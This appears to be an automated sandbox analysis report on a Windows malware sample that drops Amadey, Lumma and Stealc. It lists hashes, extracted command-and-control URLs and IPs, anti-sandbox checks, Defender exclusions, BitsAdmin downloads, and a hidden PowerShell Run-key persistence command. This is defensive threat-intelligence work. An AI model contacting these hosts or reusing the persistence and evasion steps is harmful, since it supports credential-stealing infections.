Analysis
-
max time kernel
126s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-11-2024 21:47
Static task
static1
Behavioral task
behavioral1
Sample
aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe
Resource
win10v2004-20241007-en
General
-
Target
aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe
-
Size
1.8MB
-
MD5
50a4af673c3038f686865c6698427e13
-
SHA1
587c30e231c7163741adc14582d5a4792f823722
-
SHA256
aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551
-
SHA512
fe92fd5ba8c04638d03d4db073d1d34c3ece1181f3f5e3865745ec7143900073b87e8c82cc127bfd7f1176cb24cb4d5607e4eb6c8bf68b52943ec3b8392af188
-
SSDEEP
49152:idXfSF0PLhbT4JKX7m6teFvYFI+Xb8PRDhO4IJJOmPF:SfSFILyJE7m6svY2+XYPRDhO4kJOmt
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://preside-comforter.sbs
https://savvy-steereo.sbs
https://copper-replace.sbs
https://record-envyp.sbs
https://slam-whipp.sbs
https://wrench-creter.sbs
https://looky-marked.sbs
https://plastic-mitten.sbs
https://tail-cease.cyou
Extracted
stealc
drum
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://tail-cease.cyou/api
Signatures
-
Amadey family
-
Lumma family
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
Processes:
be0794d2b7.exeaadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exeskotes.exeskotes.exenbea1t8.exeskotes.exed18269fa08.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ be0794d2b7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ nbea1t8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d18269fa08.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepid Process 116 powershell.exe 5692 powershell.exe 116 powershell.exe 5692 powershell.exe 1744 powershell.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
Processes:
bitsadmin.exebitsadmin.exepid Process 4496 bitsadmin.exe 1452 bitsadmin.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
skotes.exeskotes.exed18269fa08.exebe0794d2b7.exeaadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exenbea1t8.exeskotes.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d18269fa08.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion be0794d2b7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion be0794d2b7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion nbea1t8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion nbea1t8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d18269fa08.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exeskotes.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation skotes.exe -
Executes dropped EXE 11 IoCs
Processes:
skotes.exeskotes.exenbea1t8.exetvtC9D3.exeskotes.exeuxN4wDZ.exeuxN4wDZ.exeTcMBq5M.exed18269fa08.exebe0794d2b7.exe22284f96d6.exepid Process 3316 skotes.exe 3324 skotes.exe 3172 nbea1t8.exe 2184 tvtC9D3.exe 4292 skotes.exe 688 uxN4wDZ.exe 4188 uxN4wDZ.exe 4760 TcMBq5M.exe 3796 d18269fa08.exe 4292 be0794d2b7.exe 920 22284f96d6.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
nbea1t8.exeskotes.exed18269fa08.exebe0794d2b7.exeaadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exeskotes.exeskotes.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine nbea1t8.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine d18269fa08.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine be0794d2b7.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine skotes.exe -
Loads dropped DLL 5 IoCs
Processes:
tvtC9D3.exeMsiExec.exepid Process 2184 tvtC9D3.exe 2184 tvtC9D3.exe 2184 tvtC9D3.exe 2420 MsiExec.exe 2420 MsiExec.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
skotes.exenbea1t8.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d18269fa08.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1010020001\\d18269fa08.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\be0794d2b7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1010021001\\be0794d2b7.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\22284f96d6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1010022001\\22284f96d6.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\1009905001\\nbea1t8.exe'\"" nbea1t8.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
TcMBq5M.exemsiexec.exemsiexec.exedescription ioc Process File opened (read-only) \??\Z: TcMBq5M.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\N: TcMBq5M.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\W: TcMBq5M.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\P: TcMBq5M.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: TcMBq5M.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\S: TcMBq5M.exe File opened (read-only) \??\T: TcMBq5M.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: TcMBq5M.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: TcMBq5M.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: TcMBq5M.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: TcMBq5M.exe File opened (read-only) \??\J: TcMBq5M.exe File opened (read-only) \??\Q: TcMBq5M.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: TcMBq5M.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\G: TcMBq5M.exe File opened (read-only) \??\R: TcMBq5M.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\H: TcMBq5M.exe File opened (read-only) \??\X: TcMBq5M.exe File opened (read-only) \??\Y: TcMBq5M.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: TcMBq5M.exe File opened (read-only) \??\L: TcMBq5M.exe File opened (read-only) \??\U: TcMBq5M.exe File opened (read-only) \??\L: msiexec.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral2/files/0x000400000001da1d-184.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
Processes:
aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exeskotes.exeskotes.exenbea1t8.exeskotes.exed18269fa08.exebe0794d2b7.exepid Process 728 aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe 3316 skotes.exe 3324 skotes.exe 3172 nbea1t8.exe 4292 skotes.exe 3796 d18269fa08.exe 4292 be0794d2b7.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
uxN4wDZ.exedescription pid Process procid_target PID 688 set thread context of 4188 688 uxN4wDZ.exe 103 -
Drops file in Windows directory 1 IoCs
Processes:
aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exedescription ioc Process File created C:\Windows\Tasks\skotes.job aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 20 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
msiexec.exebe0794d2b7.exe22284f96d6.exetaskkill.exeaadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exeping.exeuxN4wDZ.exetaskkill.exetaskkill.exetvtC9D3.exeMsiExec.exetaskkill.exeTcMBq5M.exed18269fa08.exetaskkill.exeskotes.exenbea1t8.exebitsadmin.exeuxN4wDZ.exebitsadmin.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language be0794d2b7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22284f96d6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ping.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uxN4wDZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tvtC9D3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TcMBq5M.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d18269fa08.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nbea1t8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uxN4wDZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vssvc.exedescription ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000041ba55ff39bb976e0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000041ba55ff0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090041ba55ff000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d41ba55ff000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000041ba55ff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
firefox.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid Process 1536 taskkill.exe 2940 taskkill.exe 1924 taskkill.exe 5080 taskkill.exe 2320 taskkill.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exeskotes.exeskotes.exenbea1t8.exeskotes.exed18269fa08.exebe0794d2b7.exe22284f96d6.exepid Process 728 aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe 728 aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe 3316 skotes.exe 3316 skotes.exe 3324 skotes.exe 3324 skotes.exe 3172 nbea1t8.exe 3172 nbea1t8.exe 4292 skotes.exe 4292 skotes.exe 3796 d18269fa08.exe 3796 d18269fa08.exe 4292 be0794d2b7.exe 4292 be0794d2b7.exe 920 22284f96d6.exe 920 22284f96d6.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exeTcMBq5M.exedescription pid Process Token: SeSecurityPrivilege 4156 msiexec.exe Token: SeCreateTokenPrivilege 4760 TcMBq5M.exe Token: SeAssignPrimaryTokenPrivilege 4760 TcMBq5M.exe Token: SeLockMemoryPrivilege 4760 TcMBq5M.exe Token: SeIncreaseQuotaPrivilege 4760 TcMBq5M.exe Token: SeMachineAccountPrivilege 4760 TcMBq5M.exe Token: SeTcbPrivilege 4760 TcMBq5M.exe Token: SeSecurityPrivilege 4760 TcMBq5M.exe Token: SeTakeOwnershipPrivilege 4760 TcMBq5M.exe Token: SeLoadDriverPrivilege 4760 TcMBq5M.exe Token: SeSystemProfilePrivilege 4760 TcMBq5M.exe Token: SeSystemtimePrivilege 4760 TcMBq5M.exe Token: SeProfSingleProcessPrivilege 4760 TcMBq5M.exe Token: SeIncBasePriorityPrivilege 4760 TcMBq5M.exe Token: SeCreatePagefilePrivilege 4760 TcMBq5M.exe Token: SeCreatePermanentPrivilege 4760 TcMBq5M.exe Token: SeBackupPrivilege 4760 TcMBq5M.exe Token: SeRestorePrivilege 4760 TcMBq5M.exe Token: SeShutdownPrivilege 4760 TcMBq5M.exe Token: SeDebugPrivilege 4760 TcMBq5M.exe Token: SeAuditPrivilege 4760 TcMBq5M.exe Token: SeSystemEnvironmentPrivilege 4760 TcMBq5M.exe Token: SeChangeNotifyPrivilege 4760 TcMBq5M.exe Token: SeRemoteShutdownPrivilege 4760 TcMBq5M.exe Token: SeUndockPrivilege 4760 TcMBq5M.exe Token: SeSyncAgentPrivilege 4760 TcMBq5M.exe Token: SeEnableDelegationPrivilege 4760 TcMBq5M.exe Token: SeManageVolumePrivilege 4760 TcMBq5M.exe Token: SeImpersonatePrivilege 4760 TcMBq5M.exe Token: SeCreateGlobalPrivilege 4760 TcMBq5M.exe Token: SeCreateTokenPrivilege 4760 TcMBq5M.exe Token: SeAssignPrimaryTokenPrivilege 4760 TcMBq5M.exe Token: SeLockMemoryPrivilege 4760 TcMBq5M.exe Token: SeIncreaseQuotaPrivilege 4760 TcMBq5M.exe Token: SeMachineAccountPrivilege 4760 TcMBq5M.exe Token: SeTcbPrivilege 4760 TcMBq5M.exe Token: SeSecurityPrivilege 4760 TcMBq5M.exe Token: SeTakeOwnershipPrivilege 4760 TcMBq5M.exe Token: SeLoadDriverPrivilege 4760 TcMBq5M.exe Token: SeSystemProfilePrivilege 4760 TcMBq5M.exe Token: SeSystemtimePrivilege 4760 TcMBq5M.exe Token: SeProfSingleProcessPrivilege 4760 TcMBq5M.exe Token: SeIncBasePriorityPrivilege 4760 TcMBq5M.exe Token: SeCreatePagefilePrivilege 4760 TcMBq5M.exe Token: SeCreatePermanentPrivilege 4760 TcMBq5M.exe Token: SeBackupPrivilege 4760 TcMBq5M.exe Token: SeRestorePrivilege 4760 TcMBq5M.exe Token: SeShutdownPrivilege 4760 TcMBq5M.exe Token: SeDebugPrivilege 4760 TcMBq5M.exe Token: SeAuditPrivilege 4760 TcMBq5M.exe Token: SeSystemEnvironmentPrivilege 4760 TcMBq5M.exe Token: SeChangeNotifyPrivilege 4760 TcMBq5M.exe Token: SeRemoteShutdownPrivilege 4760 TcMBq5M.exe Token: SeUndockPrivilege 4760 TcMBq5M.exe Token: SeSyncAgentPrivilege 4760 TcMBq5M.exe Token: SeEnableDelegationPrivilege 4760 TcMBq5M.exe Token: SeManageVolumePrivilege 4760 TcMBq5M.exe Token: SeImpersonatePrivilege 4760 TcMBq5M.exe Token: SeCreateGlobalPrivilege 4760 TcMBq5M.exe Token: SeCreateTokenPrivilege 4760 TcMBq5M.exe Token: SeAssignPrimaryTokenPrivilege 4760 TcMBq5M.exe Token: SeLockMemoryPrivilege 4760 TcMBq5M.exe Token: SeIncreaseQuotaPrivilege 4760 TcMBq5M.exe Token: SeMachineAccountPrivilege 4760 TcMBq5M.exe -
Suspicious use of FindShellTrayWindow 9 IoCs
Processes:
aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exeTcMBq5M.exemsiexec.exe22284f96d6.exepid Process 728 aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe 4760 TcMBq5M.exe 1492 msiexec.exe 920 22284f96d6.exe 920 22284f96d6.exe 920 22284f96d6.exe 920 22284f96d6.exe 920 22284f96d6.exe 920 22284f96d6.exe -
Suspicious use of SendNotifyMessage 6 IoCs
Processes:
22284f96d6.exepid Process 920 22284f96d6.exe 920 22284f96d6.exe 920 22284f96d6.exe 920 22284f96d6.exe 920 22284f96d6.exe 920 22284f96d6.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exeskotes.exetvtC9D3.exeuxN4wDZ.exemsiexec.exeTcMBq5M.exe22284f96d6.exedescription pid Process procid_target PID 728 wrote to memory of 3316 728 aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe 82 PID 728 wrote to memory of 3316 728 aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe 82 PID 728 wrote to memory of 3316 728 aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe 82 PID 3316 wrote to memory of 3172 3316 skotes.exe 93 PID 3316 wrote to memory of 3172 3316 skotes.exe 93 PID 3316 wrote to memory of 3172 3316 skotes.exe 93 PID 3316 wrote to memory of 2184 3316 skotes.exe 94 PID 3316 wrote to memory of 2184 3316 skotes.exe 94 PID 3316 wrote to memory of 2184 3316 skotes.exe 94 PID 2184 wrote to memory of 4888 2184 tvtC9D3.exe 95 PID 2184 wrote to memory of 4888 2184 tvtC9D3.exe 95 PID 2184 wrote to memory of 4888 2184 tvtC9D3.exe 95 PID 2184 wrote to memory of 4496 2184 tvtC9D3.exe 97 PID 2184 wrote to memory of 4496 2184 tvtC9D3.exe 97 PID 2184 wrote to memory of 4496 2184 tvtC9D3.exe 97 PID 3316 wrote to memory of 688 3316 skotes.exe 101 PID 3316 wrote to memory of 688 3316 skotes.exe 101 PID 3316 wrote to memory of 688 3316 skotes.exe 101 PID 688 wrote to memory of 4188 688 uxN4wDZ.exe 103 PID 688 wrote to memory of 4188 688 uxN4wDZ.exe 103 PID 688 wrote to memory of 4188 688 uxN4wDZ.exe 103 PID 688 wrote to memory of 4188 688 uxN4wDZ.exe 103 PID 688 wrote to memory of 4188 688 uxN4wDZ.exe 103 PID 688 wrote to memory of 4188 688 uxN4wDZ.exe 103 PID 688 wrote to memory of 4188 688 uxN4wDZ.exe 103 PID 688 wrote to memory of 4188 688 uxN4wDZ.exe 103 PID 688 wrote to memory of 4188 688 uxN4wDZ.exe 103 PID 688 wrote to memory of 4188 688 uxN4wDZ.exe 103 PID 2184 wrote to memory of 1452 2184 tvtC9D3.exe 104 PID 2184 wrote to memory of 1452 2184 tvtC9D3.exe 104 PID 2184 wrote to memory of 1452 2184 tvtC9D3.exe 104 PID 3316 wrote to memory of 4760 3316 skotes.exe 106 PID 3316 wrote to memory of 4760 3316 skotes.exe 106 PID 3316 wrote to memory of 4760 3316 skotes.exe 106 PID 4156 wrote to memory of 2420 4156 msiexec.exe 110 PID 4156 wrote to memory of 2420 4156 msiexec.exe 110 PID 4156 wrote to memory of 2420 4156 msiexec.exe 110 PID 3316 wrote to memory of 3796 3316 skotes.exe 109 PID 3316 wrote to memory of 3796 3316 skotes.exe 109 PID 3316 wrote to memory of 3796 3316 skotes.exe 109 PID 4760 wrote to memory of 1492 4760 TcMBq5M.exe 111 PID 4760 wrote to memory of 1492 4760 TcMBq5M.exe 111 PID 4760 wrote to memory of 1492 4760 TcMBq5M.exe 111 PID 3316 wrote to memory of 4292 3316 skotes.exe 114 PID 3316 wrote to memory of 4292 3316 skotes.exe 114 PID 3316 wrote to memory of 4292 3316 skotes.exe 114 PID 3316 wrote to memory of 920 3316 skotes.exe 115 PID 3316 wrote to memory of 920 3316 skotes.exe 115 PID 3316 wrote to memory of 920 3316 skotes.exe 115 PID 920 wrote to memory of 1536 920 22284f96d6.exe 116 PID 920 wrote to memory of 1536 920 22284f96d6.exe 116 PID 920 wrote to memory of 1536 920 22284f96d6.exe 116 PID 920 wrote to memory of 2940 920 22284f96d6.exe 118 PID 920 wrote to memory of 2940 920 22284f96d6.exe 118 PID 920 wrote to memory of 2940 920 22284f96d6.exe 118 PID 920 wrote to memory of 1924 920 22284f96d6.exe 120 PID 920 wrote to memory of 1924 920 22284f96d6.exe 120 PID 920 wrote to memory of 1924 920 22284f96d6.exe 120 PID 920 wrote to memory of 5080 920 22284f96d6.exe 122 PID 920 wrote to memory of 5080 920 22284f96d6.exe 122 PID 920 wrote to memory of 5080 920 22284f96d6.exe 122 PID 920 wrote to memory of 2320 920 22284f96d6.exe 124 PID 920 wrote to memory of 2320 920 22284f96d6.exe 124 PID 920 wrote to memory of 2320 920 22284f96d6.exe 124 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe"C:\Users\Admin\AppData\Local\Temp\aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:728 -
